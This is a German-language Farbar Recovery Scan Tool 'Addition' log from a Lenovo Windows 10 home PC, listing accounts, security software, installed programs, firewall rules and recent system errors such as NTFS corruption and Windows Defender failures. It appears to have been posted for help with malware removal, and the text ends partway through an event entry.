durchgeführt von seife (28-11-2020 13:18:17)
Gestartet von C:\Users\seife\Desktop
Windows 10 Home Version 1909 18363.1198 (X64) (2019-10-27 12:53:40)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2235809649-4173297830-2174137979-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2235809649-4173297830-2174137979-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-2235809649-4173297830-2174137979-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-2235809649-4173297830-2174137979-501 - Limited - Disabled)
seife (S-1-5-21-2235809649-4173297830-2174137979-1001 - Administrator - Enabled) => C:\Users\seife
WDAGUtilityAccount (S-1-5-21-2235809649-4173297830-2174137979-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.113 - Adobe Systems Incorporated)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 382.64 - NVIDIA Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.72 - Piriform)
Connect (HKLM-x32\...\MAGIX_connector_is1) (Version: 2.5.1.84 - MAGIX Software GmbH)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Digital Video Repair 3.5.0.2 (HKLM-x32\...\Digital VideoRepair_is1) (Version: 3.5.0.2 - Rising Research)
Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.)
Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.1.0.309 - )
honestech VHS to DVD 2.0 SE (HKLM-x32\...\{2856F5EA-E98A-40E4-BAD6-8C644A4A3F3C}) (Version: 2.0 - honestech)
Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{278F5FF6-100E-4089-924F-80BDB7F81B4E}) (Version: 19.10.1635.0483 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{66614300-cd9b-4a62-8b18-c97e9562dc3e}) (Version: 19.50.0 - Intel Corporation)
Lenovo App Explorer (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Host App Service) (Version: 0.273.3.730 - SweetLabs for Lenovo) <==== ACHTUNG
Lenovo OneKey Recovery (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.)
Lenovo Photo Master (HKLM-x32\...\{BC94C56A-3649-420C-8756-2ADEBE399D33}) (Version: 2.1.5222.01 - CyberLink Corp.)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.3.115.0 - Lenovo Group Ltd.)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.47 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.137.99 - )
Microsoft OneDrive (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\OneDriveSetup.exe) (Version: 20.169.0823.0008 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{0BCA8FBE-0C1C-4C65-98A3-5D34AAF41737}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 382.64 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Grafiktreiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 382.64 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
UpdateAssistant (HKLM\...\{F49D6A65-1AB6-4728-9FDA-DB5BAB631CF6}) (Version: 1.23.0.0 - Microsoft Corporation) Hidden
USB2.0 Grabber (HKLM-x32\...\{45518B6D-9DDF-4144-83E4-A56762524F35}) (Version: 7.12.000.003 - Youyan)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.0 (HKLM\...\VulkanRT1.0.42.0) (Version: 1.0.42.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0-2) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WhatsApp (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\WhatsApp) (Version: 0.2.5863 - WhatsApp)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-25] (Microsoft Corporation)
Lenovo Kontoportal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2017-04-24] (LENOVO INCORPORATED.)
Lenovo Settings -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoSettings_3.177.0.0_x86__4642shxvsv8s2 [2017-12-30] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2009.18.0_x64__k1h2ywk1493x8 [2020-10-17] (LENOVO INC.)
Mahjong Epic -> C:\Program Files\WindowsApps\KristanixStudiosAS.MahjongEpic_1.1.5.0_x64__nafbvgh473e28 [2018-10-19] (Kristanix Studios AS)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Minesweeper -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMinesweeper_3.1.9160.0_x86__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
MPEG-2-Videoerweiterung -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2019-09-26] (Microsoft Corporation)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.97.752.0_x64__mcm4njqhnhss8 [2020-09-17] (Netflix, Inc.)
SHARE.it -> C:\Program Files\WindowsApps\30608Paradox.SHAREit81_1.7.18.0_x64__ghshvk1r7eapp [2018-02-28] (SHAREit Technologies Co.Ltd) [MS Ad]
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2017-01-25 11:20 - 2016-04-22 09:49 - 000081920 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\Lenovo Photo Master\koan\_ctypes.pyd
2020-11-22 11:34 - 2020-11-22 11:34 - 000365056 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\6ed3bb811d84cfae5c88e4f7497f70de\Interop.CxHDAudioAPILib.ni.dll
2020-11-22 11:34 - 2020-11-22 11:34 - 000018944 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\9a05a4dd1206a0a6138ee46017bef537\Interop.CxUtilSvcLib.ni.dll
2019-10-27 13:59 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll
2017-01-25 11:20 - 2016-04-22 09:46 - 001732608 _____ (Intel Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\Lenovo Photo Master\subsys\PyImage\ijl20.dll
2017-01-25 11:20 - 2016-04-22 09:43 - 000348160 _____ (Microsoft Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\Lenovo Photo Master\MSVCR71.dll
2019-10-27 13:29 - 2019-10-27 13:29 - 001101824 _____ (Microsoft Corporation) [Datei ist nicht signiert] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_cbf5e994470a1a8f\MFC80.DLL
2019-10-27 13:29 - 2019-10-27 13:29 - 001093120 _____ (Microsoft Corporation) [Datei ist nicht signiert] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_cbf5e994470a1a8f\MFC80U.DLL
2019-10-27 13:28 - 2019-10-27 13:28 - 000065536 _____ (Microsoft Corporation) [Datei ist nicht signiert] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_03ce2c72205943d3\MFC80DEU.DLL
2019-10-27 13:43 - 2017-06-19 02:51 - 000339072 _____ (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert] C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem\_nvstapisvr64.dll
2017-01-25 11:20 - 2016-04-22 09:49 - 002113536 _____ (Python Software Foundation) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\Lenovo Photo Master\koan\python25.dll
2020-09-17 09:30 - 2020-05-30 19:04 - 001638912 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\x64\SQLite.Interop.dll
2020-11-14 16:48 - 2020-05-30 19:58 - 001280000 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\SQLite.Interop.dll
2020-07-02 19:26 - 2020-04-09 08:17 - 000944840 _____ (SQLite Development Team) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001 -> DefaultScope {C22B44EA-66AB-4339-A99C-A01D70B5D782} URL =
SearchScopes: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001 -> {C22B44EA-66AB-4339-A99C-A01D70B5D782} URL =
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2018-04-12 00:38 - 2016-07-16 12:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [UDP Query User{25C79E69-EA24-4D12-BD1F-F753F0990980}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{64CADD9D-6E5E-4257-8267-72B59E4A771D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{192B9366-C56E-46FD-925E-6F91AE41E04C}] => (Allow) C:\Program Files (x86)\Lenovo\Lenovo Photo Master\subsys\AdvPhotoEditor\PhotoDirector5.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{A881ED56-0EE5-488A-A51D-9F6B05CB1455}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{8B913EC0-A331-4E92-B494-249C6D2C3F78}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{A5F07B7F-FCEA-4FDE-9919-69916D35C9CB}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{73CA9710-1056-4A59-8200-783FE06CB0AE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{89E312FB-29A4-445C-B8D2-F5959DA473A8}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{680DFA79-B341-4FBE-ABF2-6011922C2CFD}] => (Allow) LPort=2869
FirewallRules: [{75A1BC04-E9AB-4DCA-AC82-038D005F5733}] => (Allow) LPort=1900
FirewallRules: [{09000672-7FA1-4F2B-96DC-07C1129E3BD0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Wireless Connectivity Solutions -> )
FirewallRules: [{40BF11AF-A4B4-4107-BD40-E077B9964CEF}] => (Block) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{CA8C043E-442F-4CDE-8386-084BA41330C4}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{9EFBFAE9-F86A-4F88-A7F0-8FC2F56CA18F}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
==================== Wiederherstellungspunkte =========================
ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:101.53 GB) (Free:32.26 GB) (32%)
==================== Fehlerhafte Geräte im Gerätemanager ============
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (11/28/2020 12:38:19 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (9696,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/27/2020 05:43:34 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1080,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/27/2020 05:35:08 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (8828,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/27/2020 05:24:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: firefox.exe, Version: 83.0.0.7621, Zeitstempel: 0x5fad6773
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000bdc047
ID des fehlerhaften Prozesses: 0x17c0
Startzeit der fehlerhaften Anwendung: 0x01d6c4d9b06a10a7
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 584962b5-aa75-47c9-a882-8e6151d94592
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (11/27/2020 05:23:56 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
Error: (11/26/2020 08:44:48 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7116,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/26/2020 08:33:09 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (8828,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/26/2020 08:12:59 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (3148,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Systemfehler:
=============
Error: (11/28/2020 01:07:17 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "SAService" hat einen ungültigen aktuellen Status gemeldet: 14
Error: (11/28/2020 12:57:28 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "Conexant SmartAudio service" hat einen ungültigen aktuellen Status gemeldet: 14
Error: (11/28/2020 12:57:09 PM) (Source: Ntfs) (EventID: 55) (User: NT-AUTORITÄT)
Description: In der Dateisystemstruktur auf Volume "C:" wurde eine Beschädigung erkannt.
Die genaue Art der Beschädigung ist unbekannt. Die Dateisystemstrukturen müssen offline überprüft und repariert werden.
Error: (11/28/2020 12:57:09 PM) (Source: Microsoft-Windows-Ntfs) (EventID: 98) (User: NT-AUTORITÄT)
Description: C:\Device\HarddiskVolume33
Error: (11/28/2020 12:57:19 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am 28.11.2020 um 12:39:05 unerwartet heruntergefahren.
Error: (11/26/2020 08:45:58 PM) (Source: DCOM) (EventID: 10010) (User: HSE)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/26/2020 08:20:21 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "Conexant SmartAudio service" hat einen ungültigen aktuellen Status gemeldet: 14
Error: (11/26/2020 08:03:39 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Dolby DAX2 API Service" wurde mit folgendem Fehler beendet:
Die Sicherheit muss initialisiert werden, bevor Schnittstellen gemarshallt oder unmarshallt werden. Änderungen können nach der Initialisierung nicht vorgenommen werden.
Windows Defender:
===================================
Date: 2020-11-28 13:00:56.118
Description:
Bei Windows Defender Antivirus ist ein Fehler beim Laden der Sicherheitsinformationen aufgetreten. Es wird versucht, zu einer als fehlerfrei bekannten Version zurückzukehren.
Sicherheitsversion versucht: Aktuell
Fehlercode: 0x80070003
Fehlerbeschreibung: Das System kann den angegebenen Pfad nicht finden.
tSicherheitsversion: 0.0.0.0;0.0.0.0
Modulversion: 0.0.0.0
CodeIntegrity:
===================================
Date: 2020-11-28 12:28:54.622
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-11-26 17:37:11.047
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-11-26 17:36:49.624
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-10-17 11:07:43.024
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-17 11:01:14.880
Description:
